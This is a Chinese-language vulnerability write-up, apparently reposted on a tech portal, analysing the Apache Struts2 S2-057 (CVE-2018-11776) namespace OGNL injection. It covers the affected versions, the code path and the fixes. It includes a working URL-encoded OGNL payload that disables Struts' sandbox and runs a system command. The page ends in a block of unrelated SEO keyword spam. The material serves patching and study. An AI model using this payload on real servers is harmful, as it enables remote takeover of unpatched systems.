千家信息网

如何进行Apache Struts2 S2-057远程代码执行漏洞分析

发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,这篇文章给大家介绍如何进行Apache Struts2 S2-057远程代码执行漏洞分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。前言Apache Struts框架是一个基于
千家信息网最后更新 2025年02月23日如何进行Apache Struts2 S2-057远程代码执行漏洞分析

这篇文章给大家介绍如何进行Apache Struts2 S2-057远程代码执行漏洞分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

前言

Apache Struts框架是一个基于 Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目,Struts基于Model-View-Controller (MVC)的设计模式,可以用来构件复杂的Web应用。它允许我们分解一个应用程序的商业逻辑、控制逻辑和表现逻辑的代码,使它的重用性和维护性更好。Struts框架是Jakarta工程的一部分,由Apache软件基金会管理。

天融信阿尔法实验室将为你带来Apache Struts2 S2-057远程代码执行漏洞分析~

一、 漏洞描述

当struts.mapper.alwaysSelectFullNamespace设置为true,并且package标签页以及result的param标签页的namespace值的缺失,或使用了通配符时可造成namespace被控制,最终namespace会被带入OGNL语句执行,从而产生远程代码执行漏洞。

1. 受影响的系统版本

Apache Struts 2.3 - Struts 2.3.34

Apache Struts 2.5 - Struts 2.5.16

2. 漏洞编号

CVE-2018-11776

二、环境搭建

1.下载:http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip

2. 修改配置文件struts-actionchaining.xml

该漏洞有多种攻击向量包括:

Redirect action

Action chaining

Postback result

以第一种为例子,修改配置文件内容为:


三、漏洞细节

在DefaultActionMapper这个类的parseNameAndNamespace方法里。

当alwaysSelectFullNamespace被设置为true时,namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。

Action执行结束之后,程序会调用ServletActionRedirectResult类中的execute()方法进行重定向Result的解析。

首先,当namespace为空时,调用invocation.getProxy().getNamespace()赋值给变量namespace,然后将变量namespace传入ActionMapping构造函数中。

然后,ActionMapper.getUriFromActionMapping()对ActionMapping后的值进行重组,生成一个URL字符串(包含namespace),并赋值给了tmplocation变量。

紧接着将带有namespace的tmplocation传入了setLocation()方法中。

该方法将tmpLocation值赋值给了StrutsResultSupport类中的location变量。

然后,跟踪super.execute()方法。

继续跟踪ServletActionResult类中的super.execute()。

在StrutsResultSupport类中的execute()方法中,刚刚被赋值的location变量(带有namespace的)被传入了conditionalParse()方法。

最终,通过TextParseUtil.translateVariables()对namespace进行OGNL解析,导致远程代码执行漏洞。

四、漏洞利用

1. 访问url 为/${(111+111)}/actionChain1.action的地址。

访问触发OGNL表达式,url变为/222/register2.action,漏洞存在。

2. payload:

%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d

此payload 仅适用于2.3系列版本。

五、修复建议

1. 官方补丁

目前官方已发布最新版本来修复此漏洞,受影响的用户请尽快升级到Apache Struts 2.3.35 或 Struts 2.5.17版本:https://struts.apache.org/download.cgi#struts2517。

2. 手工修复

修改配置文件:

固定package标签页以及result的param标签页的namespace值,以及禁止使用通配符。

关于如何进行Apache Struts2 S2-057远程代码执行漏洞分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

漏洞 方法 代码 变量 标签 漏洞分析 分析 内容 文件 框架 版本 逻辑 应用 配置 官方 更多 程序 通配符 帮助 影响 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 数据库删除符合条件的行数 惠康服务器转速过高 太原网络安全培训好找吗 数据库组内排序语句 有关校园网络安全的内容 即显短信软件开发 数据库中的最大字号查询 黑板报版面设计图网络安全 所有的服务器 河南信道捷网络技术有限公司 杭州软件开发都在哪个区 软件开发学什么就业前景如何 sql数据库 介绍 战地5没有日本服务器 汽车网络技术有什么特点 下一代互联网金融科技 广东企业云空间工具云服务器 数据库设计的核心是阶段 路由器vpn服务器 如何使数据库表能存入中文 汽车合格证信息多久传到数据库 天联服务器的程序怎么打开 网络安全主题班会的活动纪实 网络安全与应用基础 数据库修改语句关键字 学计算机网络技术要学高等数学吗 把自己电脑变成服务器 tara网络安全 贵州监控服务器散热器定制云主机 空军的计算机网络技术
0